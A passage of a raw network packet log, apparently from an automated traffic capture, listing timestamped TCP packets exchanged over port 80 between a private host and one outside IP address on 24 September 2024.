                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.348454952 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.348464012 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.348479033 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.348481894 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.348496914 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.348504066 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.348517895 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.348526955 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.348534107 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.348534107 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.348567009 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.348691940 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.348700047 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.348714113 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.348728895 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.348757982 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.348772049 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.384243965 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.384267092 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.384274006 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.384363890 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.384370089 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.384377956 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.384416103 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.384424925 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.384443045 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.384473085 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.384495020 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.384557962 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.413487911 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.413532019 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.413541079 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.413625002 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.413625956 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.413675070 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.413683891 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.413698912 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.413716078 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.413767099 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.413767099 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.413811922 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.413819075 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.413858891 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.413947105 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.413954973 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.413963079 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.413979053 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.413992882 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414006948 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414011002 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414020061 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414056063 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414056063 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414258957 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414267063 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414274931 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414309978 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414321899 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414323092 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414349079 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414360046 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414367914 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414386034 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414397955 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414400101 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414400101 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414417982 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414426088 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414442062 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414450884 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414464951 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414464951 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414478064 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414563894 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414675951 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414877892 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414895058 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414901972 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414921045 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414932966 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414940119 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414959908 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414968014 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.414979935 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415029049 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415029049 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415096998 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415203094 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415282965 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415292025 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415411949 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415414095 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415421963 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415431023 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415452003 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415493011 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415508032 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415555000 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415589094 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415596962 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415604115 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415620089 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415627956 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415646076 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415657997 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415663958 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415673018 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415745020 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415745020 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415891886 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415900946 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415908098 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415924072 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415946960 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.415956020 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.416007042 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.416007042 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.416115999 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.416122913 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.416135073 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.416146994 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.416155100 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.416171074 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.416197062 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.416197062 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.416253090 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.416279078 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.416918039 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.416984081 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.416991949 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.417047977 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.417054892 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.417069912 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.417081118 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.417081118 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.417088032 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.417105913 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.417149067 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.417159081 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.417943954 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418001890 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418015957 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418020010 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418077946 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418077946 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418135881 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418143988 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418164015 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418176889 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418235064 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418235064 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418323040 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418381929 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418389082 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418412924 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418417931 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418464899 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418473005 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418481112 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418523073 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418525934 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418525934 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418530941 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418627024 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418701887 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418720007 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418729067 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418755054 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418848038 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418857098 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418858051 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418879032 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418889046 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418937922 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418937922 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418955088 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418962955 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.418982983 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.419038057 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.419038057 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.419059992 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.419068098 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.419085026 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.419101954 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.419109106 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.419130087 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.419176102 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.422135115 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.422247887 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.422278881 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.422369003 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.422375917 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.422394991 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.422398090 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.422424078 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.422441959 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.422441959 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.422456026 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.422512054 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.436470985 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.436480045 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.436487913 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.436577082 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.436585903 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.436604977 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.436603069 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.436614990 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.436633110 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.436672926 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.436672926 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.436749935 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.437489033 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.437540054 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.437552929 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.437606096 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.437613010 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.437659979 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.437668085 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.437709093 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.437716007 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.437728882 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.437752008 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.437766075 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.437784910 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.437823057 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.437848091 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.437855959 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.437875032 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.437886000 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.437931061 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.437931061 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.437954903 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438043118 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438050032 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438070059 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438081026 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438101053 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438110113 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438126087 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438126087 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438132048 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438173056 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438173056 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438277006 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438283920 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438292027 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438297987 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438324928 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438332081 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438333035 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438348055 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438361883 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438384056 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438410044 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438416004 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438498020 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438513041 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438519955 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438539028 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438550949 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438561916 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438571930 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438572884 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438616037 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438636065 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438680887 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438688993 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438728094 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438751936 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438795090 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438803911 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.438811064 CEST8049735103.130.147.211192.168.2.8
